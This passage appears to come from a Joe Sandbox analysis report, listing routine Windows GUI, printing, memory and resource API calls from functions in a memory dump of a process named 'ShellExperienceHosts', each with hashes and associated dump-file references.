GetSystemMetrics.USER32(00000032), ref: 6C9DFA4C
SetRectEmpty.USER32(?), ref: 6C9DFA5F
EnumDisplayMonitors.USER32(00000000,00000000,6C9DF846,?,?,00000000,6C9DF96C), ref: 6C9DFA6F
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 6C9DFA7E
SystemParametersInfoW.USER32(00001002,00000000,?,00000000), ref: 6C9DFAAB
SystemParametersInfoW.USER32(00001012,00000000,?,00000000), ref: 6C9DFABF
SystemParametersInfoW.USER32 ref: 6C9DFAE5

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: System$InfoParameters$Metrics$DisplayEmptyEnumMonitorsRect
String ID:
API String ID: 2614369430-0
Opcode ID: 6910ba3215f1f2bfa2f3a84e6c62ad6adfeaff6cf39c17c143783196d2324615
Instruction ID: 61fa30124fa38921c2e5078310d8fd03721acd788218f6ac7573e752da1bbc79
Opcode Fuzzy Hash: 6910ba3215f1f2bfa2f3a84e6c62ad6adfeaff6cf39c17c143783196d2324615
Instruction Fuzzy Hash: 4C2159B1301616BFE7148F719889AE7BBBCFF0A349F01422AE94DC7140E7B06844CBA0

Function 6C9CCFF5 Relevance: 12.1, APIs: 8, Instructions: 64memorystringCOMMON

Download Yara Rule

APIs

GlobalLock.KERNEL32(00000000), ref: 6C9CD009
lstrcmpW.KERNEL32(00000000,?), ref: 6C9CD022
OpenPrinterW.WINSPOOL.DRV(?,?,00000000), ref: 6C9CD037
DocumentPropertiesW.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 6C9CD057
GlobalAlloc.KERNEL32(00000042,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 6C9CD05F
GlobalLock.KERNEL32(00000000), ref: 6C9CD06D
DocumentPropertiesW.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000002), ref: 6C9CD07E
ClosePrinter.WINSPOOL.DRV(?), ref: 6C9CD096

Part of subcall function 6C9D18D0: GlobalFlags.KERNEL32(?), ref: 6C9D18DD
Part of subcall function 6C9D18D0: GlobalUnlock.KERNEL32(?), ref: 6C9D18EB
Part of subcall function 6C9D18D0: GlobalFree.KERNEL32(?), ref: 6C9D18F7

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: Global$DocumentLockProperties$AllocCloseFlagsFreeOpenPrinterPrinter.Unlocklstrcmp
String ID:
API String ID: 168474834-0
Opcode ID: fa5e27081687f06e0910e03d846f0237257e9b1574f80368d516987a7413187f
Instruction ID: a48241dc75304d623f5db547d8812e667792f1fd498b5b5b74e176ea2402ed51
Opcode Fuzzy Hash: fa5e27081687f06e0910e03d846f0237257e9b1574f80368d516987a7413187f
Instruction Fuzzy Hash: 6E119072641608FFEF229FB4CD84DAF7ABDEF04648B004429FA1595A30D731D955DB21

Function 6C9C2DB0 Relevance: 12.0, APIs: 8, Instructions: 49memoryCOMMON

Download Yara Rule

APIs

GlobalSize.KERNEL32(?), ref: 6C9C2DB9
GlobalAlloc.KERNEL32(00002002,00000000), ref: 6C9C2DD1
GlobalLock.KERNEL32(?), ref: 6C9C2DE1
GlobalLock.KERNEL32(?), ref: 6C9C2DEA
GlobalSize.KERNEL32(?), ref: 6C9C2DF7

Part of subcall function 6C9C26E8: _memcpy_s.LIBCMT ref: 6C9C26F7

GlobalUnlock.KERNEL32(?), ref: 6C9C2E08
GlobalUnlock.KERNEL32(?), ref: 6C9C2E11
GlobalSize.KERNEL32(?), ref: 6C9C2E21

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: Global$Size$LockUnlock$Alloc_memcpy_s
String ID:
API String ID: 3833998449-0
Opcode ID: 09f7512e5285a1fc25fab0d6b418f5b539c5d1504aeb2c8d95f98a736de467ab
Instruction ID: fdebcca821551b01cec7fa1f0e1793fb7d2406bfe81646f328e7d43ee9c1acb6
Opcode Fuzzy Hash: 09f7512e5285a1fc25fab0d6b418f5b539c5d1504aeb2c8d95f98a736de467ab
Instruction Fuzzy Hash: 70017C72700351BBDB212FA9ACCC89F7E7CEF2E6A17004525F90AAB211DA709804C661

Function 6C9D4B7B Relevance: 12.0, APIs: 8, Instructions: 34COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32(0000000B), ref: 6C9D4B81
GetSystemMetrics.USER32(0000000C), ref: 6C9D4B8C
GetSystemMetrics.USER32(00000002), ref: 6C9D4B97
GetSystemMetrics.USER32(00000003), ref: 6C9D4BA5
GetDC.USER32(00000000), ref: 6C9D4BB3
GetDeviceCaps.GDI32(00000000,00000058), ref: 6C9D4BBE
GetDeviceCaps.GDI32(00000000,0000005A), ref: 6C9D4BCA
ReleaseDC.USER32(00000000,00000000), ref: 6C9D4BD6

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: MetricsSystem$CapsDevice$Release
String ID:
API String ID: 1151147025-0
Opcode ID: 21b38f26f7981ed43d5ade550d5fbf779e2c0562d14fd402be291476288c0772
Instruction ID: 4b32efc36ff1304ed6914a58f0d7576a1643e16bf55c1ba8fb9c3071cd5b6c57
Opcode Fuzzy Hash: 21b38f26f7981ed43d5ade550d5fbf779e2c0562d14fd402be291476288c0772
Instruction Fuzzy Hash: 8FF0E771B41781AFEB205F71A94DF5A7B74FF46712F014516F20ADB580DBB588018FA0

Function 6C9C5F44 Relevance: 10.8, APIs: 7, Instructions: 347COMMON

Download Yara Rule

APIs

OffsetRect.USER32(?,00000000,?), ref: 6C9C605D
OffsetRect.USER32(?,?,00000000), ref: 6C9C607D
SetCapture.USER32(?), ref: 6C9C60F0
RedrawWindow.USER32(?,00000000,00000000,00000180,00000000), ref: 6C9C610F
ReleaseCapture.USER32 ref: 6C9C619D
OffsetRect.USER32(?,000000FF,000000FF), ref: 6C9C6213
OffsetRect.USER32(?,000000FF,000000FF), ref: 6C9C6224

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: OffsetRect$Capture$RedrawReleaseWindow
String ID:
API String ID: 1110970518-0
Opcode ID: 48c07f862b9846cd1aa66e5e3b1b402fc0b4f95a723564386aedcfe5347abf81
Instruction ID: 1510d4a2203553e34f7a2eb703c1e90b1b4f3467920487794caaa14b93a1fe2a
Opcode Fuzzy Hash: 48c07f862b9846cd1aa66e5e3b1b402fc0b4f95a723564386aedcfe5347abf81
Instruction Fuzzy Hash: C9D12B357006549FCF148F64D898BAD37B5BF89310F1901BAED0AEB795CB70A905CB92

Function 6CA6A79B Relevance: 10.8, APIs: 7, Instructions: 266windowCOMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6CA6A7A2
CreateCompatibleDC.GDI32(00000000), ref: 6CA6A80E
CreateCompatibleBitmap.GDI32(?,00000020,?), ref: 6CA6A844
SelectObject.GDI32(?,00000000), ref: 6CA6A89E
BitBlt.GDI32(?,00000000,00000000,00000020,?,2BE8FFFF,00000020,?,00CC0020), ref: 6CA6A8C6
BitBlt.GDI32(?,00000020,?,00000020,00000048,?,00000000,00000000,00CC0020), ref: 6CA6AA9F
DeleteObject.GDI32(?), ref: 6CA6AAB6

Part of subcall function 6CA393A6: FillRect.USER32(?,?,-000000A8), ref: 6CA393C2

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: CompatibleCreateObject$BitmapDeleteFillH_prolog3RectSelect
String ID:
API String ID: 3910664508-0
Opcode ID: d8683c921b7973b83ea2d6bdab130681d8ba96852e305200f1fee68d74055597
Instruction ID: 48cd13e527489ce58ff94650bd3734049c8e6d889eb96b8382d3359922f65db1
Opcode Fuzzy Hash: d8683c921b7973b83ea2d6bdab130681d8ba96852e305200f1fee68d74055597
Instruction Fuzzy Hash: 0DA1AE71A0061A9FDB00CFA9C980AEEBBF5FF59304F14422AF556E7A50DB30D985DB60

Function 6C9AA530 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 177COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6C9AA5AF
std::_Lockit::_Lockit.LIBCPMT ref: 6C9AA5D3
std::_Lockit::~_Lockit.LIBCPMT ref: 6C9AA5F4
std::_Lockit::~_Lockit.LIBCPMT ref: 6C9AA688
Concurrency::cancel_current_task.LIBCPMT ref: 6C9AA767

Part of subcall function 6C9A29D0: ___std_exception_copy.LIBVCRUNTIME ref: 6C9A2A0E

Strings

IOVA, xrefs: 6C9AA54D

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: Lockitstd::_$Lockit::_Lockit::~_$Concurrency::cancel_current_task___std_exception_copy
String ID: IOVA
API String ID: 1238493420-1369737602
Opcode ID: 6df1a7bd0be2976fd46c09eb66ae68f43f24b5e7b20d3af64ad61eaace881962
Instruction ID: ff814eb04d79342e94e62f7782caf4f935afd1c27058307f3eca23a3b73e92b9
Opcode Fuzzy Hash: 6df1a7bd0be2976fd46c09eb66ae68f43f24b5e7b20d3af64ad61eaace881962
Instruction Fuzzy Hash: 25715674A00214DFDB04CF98D984B9EBBB4BF49718F148159E815AB7A0DB30E946CF90

Function 6CACEF10 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 168COMMON

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 6CACEF17

Part of subcall function 6CACEE81: OleGetClipboard.OLE32(?), ref: 6CACEE97

ReleaseStgMedium.OLE32(?), ref: 6CACEF9B
ReleaseStgMedium.OLE32(?), ref: 6CACEFE2
ReleaseStgMedium.OLE32(?), ref: 6CACEFF1
CoTaskMemFree.OLE32(?,?,00000000,?,?,?,?,?,?,?,00000040,6CA3C49B,?,00000000,00000000,00000000), ref: 6CACF0A1

Strings

', xrefs: 6CACEF4F

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: MediumRelease$ClipboardFreeH_prolog3_catchTask
String ID: '
API String ID: 3213536121-1997036262
Opcode ID: 2d2ae7f7ae830437c82b6d0c77d2dd1d14d6fbc078312011df830f3f685e51bf
Instruction ID: 1191a2ecad9fcfd2ffd128abf62b287a0bef7cec7821bd463e262308ac988ec7
Opcode Fuzzy Hash: 2d2ae7f7ae830437c82b6d0c77d2dd1d14d6fbc078312011df830f3f685e51bf
Instruction Fuzzy Hash: 4F51A331B012499BDF01CFB8C845AEEBBB5AF59718F144019E905F7780EB71DA85CBA2

Function 6C9D0570 Relevance: 10.7, APIs: 7, Instructions: 166windowCOMMON

Download Yara Rule

APIs

Part of subcall function 6C9F6E21: IsWindow.USER32(?), ref: 6C9F6E2D

SendMessageW.USER32(?,00000010,00000000,00000000), ref: 6C9D0734

Part of subcall function 6C9F5815: GetClientRect.USER32(?,?), ref: 6C9F583D
Part of subcall function 6C9F5815: PtInRect.USER32(?,00000000,?), ref: 6C9F5857

ScreenToClient.USER32(?,?), ref: 6C9D0601
PtInRect.USER32(?,?,?), ref: 6C9D0614
SendMessageW.USER32(?,00000010,00000000,00000000), ref: 6C9D0646
GetParent.USER32(?), ref: 6C9D0676
SendMessageW.USER32(?,00000010,00000000,00000000), ref: 6C9D06F4
GetFocus.USER32 ref: 6C9D06FA

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: MessageRectSend$Client$FocusParentScreenWindow
String ID:
API String ID: 1639644240-0
Opcode ID: f0615b2b42191da996d1d17b0b158d8ee51806515fc92ef9c358fcfb28ce4815
Instruction ID: ebbcffeaa24d77998fad5b4be301569e9e83e72a58e02662a12dd64ce7af695b
Opcode Fuzzy Hash: f0615b2b42191da996d1d17b0b158d8ee51806515fc92ef9c358fcfb28ce4815
Instruction Fuzzy Hash: 1E515B71A01A89ABDB108FA5C84499E7BB8FF59748B119165E819EB650EB30E900CF50

Function 6CA2A934 Relevance: 10.7, APIs: 7, Instructions: 162windowCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 6CA2A93E

Part of subcall function 6CA48B41: __EH_prolog3.LIBCMT ref: 6CA48B48

GetMenuItemCount.USER32(?), ref: 6CA2A994
GetMenuItemID.USER32(?,00000000), ref: 6CA2A9B1
GetMenuItemCount.USER32(?), ref: 6CA2A9E6
GetMenuItemID.USER32(?,00000000), ref: 6CA2AA18
SendMessageW.USER32(?,00000234,00000000,00000000), ref: 6CA2AA7D
GetMenuState.USER32(00000001,00000000,00000400), ref: 6CA2AADA

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: Menu$Item$Count$H_prolog3H_prolog3_MessageSendState
String ID:
API String ID: 999183886-0
Opcode ID: 1e0033bc93ff8dd97567e5d9f735442b23d4690865f1ccd8af05efc799ac3b89
Instruction ID: 9412db7e38d8e7e0bf81f835a23344011600ec926c659abfee0d6bc30a2ffdb2
Opcode Fuzzy Hash: 1e0033bc93ff8dd97567e5d9f735442b23d4690865f1ccd8af05efc799ac3b89
Instruction Fuzzy Hash: 20619230A012669BDF25CF24CD54BEDB776AF15318F1842A9E829A66D0DB389EC5CF40

Function 6CA3A014 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 158COMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,00000000,00000000,00000000,00002000), ref: 6CA3A0F7
GetObjectW.GDI32(00000000,00000018,?), ref: 6CA3A114
DeleteObject.GDI32(00000000), ref: 6CA3A11F
DeleteObject.GDI32(00000000), ref: 6CA3A1C4

Part of subcall function 6CA3AE08: GetObjectW.GDI32(?,00000054,?), ref: 6CA3AE22

__EH_prolog3.LIBCMT ref: 6CA3A01B

Part of subcall function 6C9D18AA: DeleteObject.GDI32(?), ref: 6C9D18BC

Part of subcall function 6CA39EBA: FindResourceW.KERNEL32(00000000,?,PNG,?,?,?,6CB42EC0,?,6CA3ACD1,?,?,?,00000038,6CA3998F), ref: 6CA39EDC
Part of subcall function 6CA39EBA: LoadResource.KERNEL32(00000000,00000000,?,6CB42EC0,?,6CA3ACD1,?,?,?,00000038,6CA3998F), ref: 6CA39EEA
Part of subcall function 6CA39EBA: LockResource.KERNEL32(00000000,?,6CB42EC0,?,6CA3ACD1,?,?,?,00000038,6CA3998F), ref: 6CA39EF5
Part of subcall function 6CA39EBA: SizeofResource.KERNEL32(00000000,00000000,?,6CB42EC0,?,6CA3ACD1,?,?,?,00000038,6CA3998F), ref: 6CA39F03

Strings

, xrefs: 6CA3A12A

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: Object$Resource$Delete$Load$FindH_prolog3ImageLockSizeof
String ID:
API String ID: 1337615151-3916222277
Opcode ID: a5d277fa3671ecbe4797ca8651501a0eb908eae6338726267c6750ec3303cbfc
Instruction ID: 08c4109392ceec5a12b1b69bee2e0f821398732b2f4b900fff35fe2f8b6d12be
Opcode Fuzzy Hash: a5d277fa3671ecbe4797ca8651501a0eb908eae6338726267c6750ec3303cbfc
Instruction Fuzzy Hash: F5519671A016369FDF04DFE4C8A0AEEB375BF15308F045229E429E3A50DB349D98CBA1

Function 6C9BBE50 Relevance: 10.6, APIs: 7, Instructions: 135windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 6C9BBE7D
PeekMessageW.USER32(6CB671B0,00000000,00000000,00000000,00000000), ref: 6C9BBE9F
UpdateWindow.USER32(?), ref: 6C9BBEB9
SendMessageW.USER32(?,00000121,00000001,?), ref: 6C9BBEDF
SendMessageW.USER32(?,0000036A,00000000,00000000), ref: 6C9BBEF7
UpdateWindow.USER32(?), ref: 6C9BBF44

Part of subcall function 6C9BE4F7: GetWindowLongW.USER32(00000004,000000F0), ref: 6C9BE504

PeekMessageW.USER32(6CB671B0,00000000,00000000,00000000,00000000), ref: 6C9BBF8E

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: Message$Window$PeekSendUpdate$LongParent
String ID:
API String ID: 2853195852-0
Opcode ID: f1da9f272ed877d831afa541212feb4ce608d6c1d5fae0aaa971dce6c4cc0b18
Instruction ID: 2c1a52c298a2aab3d6bd9542eef051ce242c9678c0bdbf19acf9b43a7380793e
Opcode Fuzzy Hash: f1da9f272ed877d831afa541212feb4ce608d6c1d5fae0aaa971dce6c4cc0b18
Instruction Fuzzy Hash: C0418C71B01609BBEB049FB5C888BAFBBBCFF14759F104158E915E7990DB70D9108B90

Function 6CA75A44 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 124COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6CA75A4B

Part of subcall function 6C9FE464: __EH_prolog3.LIBCMT ref: 6C9FE46B

Part of subcall function 6CADFDEA: SetRectEmpty.USER32(?), ref: 6CADFE1F

SetRectEmpty.USER32(?), ref: 6CA75B7B
SetRectEmpty.USER32 ref: 6CA75B8C
SetRectEmpty.USER32(?), ref: 6CA75B93

Strings

True, xrefs: 6CA75B9B, 6CA75BA6, 6CA75BEE
False, xrefs: 6CA75BFA, 6CA75BFF, 6CA75C07

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: EmptyRect$H_prolog3
String ID: False$True
API String ID: 3752103406-1895882422
Opcode ID: baef2d2cd972eb3a1acfe39f9a93a6c9840abce412e2fd679df1371ece107ac6
Instruction ID: da8200181018b3739b03266902e2d9e7ba55193e9be43340559e83873f8e1f51
Opcode Fuzzy Hash: baef2d2cd972eb3a1acfe39f9a93a6c9840abce412e2fd679df1371ece107ac6
Instruction Fuzzy Hash: 2951E4B09052419FCB0ACF18D5857E9BBE8BF58314F1881BEE81C9F796CB745648CB64

Function 6C9CE94B Relevance: 10.6, APIs: 7, Instructions: 122windowthreadCOMMON

Download Yara Rule

APIs

Part of subcall function 6C9CE8A0: GetParent.USER32(?), ref: 6C9CE8FD
Part of subcall function 6C9CE8A0: GetLastActivePopup.USER32(?), ref: 6C9CE910
Part of subcall function 6C9CE8A0: IsWindowEnabled.USER32(?), ref: 6C9CE924
Part of subcall function 6C9CE8A0: EnableWindow.USER32(?,00000000), ref: 6C9CE937

EnableWindow.USER32(?,00000001), ref: 6C9CE996
GetWindowThreadProcessId.USER32(?,?), ref: 6C9CE9AC
GetCurrentProcessId.KERNEL32 ref: 6C9CE9B6
SendMessageW.USER32(?,00000376,00000000,00000000), ref: 6C9CE9CC
GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 6C9CEA57
MessageBoxW.USER32(?,?,?,6C9B486E), ref: 6C9CEA79
EnableWindow.USER32(00000000,00000001), ref: 6C9CEA9E

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

